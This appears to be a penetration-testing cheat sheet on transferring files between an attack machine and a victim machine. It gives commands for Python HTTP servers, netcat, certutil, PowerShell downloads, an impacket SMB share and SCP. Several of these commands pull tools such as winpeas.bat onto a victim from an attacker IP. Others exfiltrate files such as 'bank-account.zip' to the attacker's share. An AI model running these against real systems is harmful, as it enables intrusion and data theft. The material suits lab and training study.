File Transfers

Linux and Windows file transfers

Python HTTP Server

Python Simple HTTP Server is a straight forward process:exit: Ctrl+↩

# Hosting Machine
python -m SimpleHTTPServer

# Connecting Machine:
curl -o output.txt http://IP_Address:portnumber/filename.txt
#or
wget http://IP_Address:portnumber/filename.txt

Port number for connection can be specified by appending it to the end of the command, like so:

"python -m SimpleHTTPServer 80"‌

Netcat

# receiving/listening:
nc -l -p 4444 > outfile.txt

# sending/connecting:
nc -w 3 DEST_IP_ADDRESS 4444 < sendfile.txt

‌CertUtil

certutil -urlcache -split -f "http://IP_ADDRESS:8000/winpeas.bat" winpeas.bat
# or
certutil -urlcache -split -f "http://IP_ADDRESS:PORT/sourcefile.txt" NamedOutFile.txt

‌Powershell

powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

‌Setting up SMB Server

https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/smbserver.pyraw.githubusercontent.comraw.githubusercontent.com

You'll need to make sure the entire packet suite is unpacked and installed in /opt with "pip install ." Then move the smbserver.py file to the working directory. More info: https://blog.ropnop.com/transferring-files-from-kali-to-windows/#setting-up-the-server

#From attack machine:
sudo python smbserver.py TMP /tmp  # you can use another folder than tmp

#move file to /tmp
cp whoami.exe /tmp/whoami.exe

#For windows:
#from victim machine:
copy \\192.168.119.134\tmp\whoami.exe


# from victim machine, to list SMB contents:
dir \\192.168.119.134\TMP

# from victim machine to put file on attacking machine's SMB share:
move bank-account.zip \\192.168.119.134\TMP

# SMBv1 might be depreciated on newer windows.  Try this to allow it:
Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

SSH transfers to Attack Machine (exfiltrate)

Ensure OpenSSH is available on Kali machine with:
Create a new user that can access SSH locally, so that you do not have to enter your credentials on the victim machine.

apt list openssh-server

Edit the /etc/ssh/sshd_config file like so:

FROM:
#PermitRootLogin prohibit-password

TO:
PermitRootLogin yes

Stop and Stop SSH:

systemctl start ssh.socket

systemctl stop ssh.socket

Using SCP to copy files over SSH.

#from victim machine, after following the above steps to enable SSH:
scp PATH_TO_LOCALFILE USER@DEST_IP:/file/path/for/newfile 

#example
scp -r ./crossfile kali@192.168.119.101:/home/kali/crossfilefires

Invoke Web Request (HTTP request like curl)

Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"

PreviousInitial Enumeration NextWriting /etc/passwd

Last updated 5 years ago

hashtagPython HTTP Server

hashtagNetcat

hashtag‌CertUtil

hashtag‌Powershell

hashtag‌Setting up SMB Server

hashtagSSH transfers to Attack Machine (exfiltrate)

hashtagUsing SCP to copy files over SSH.

hashtagInvoke Web Request (HTTP request like curl)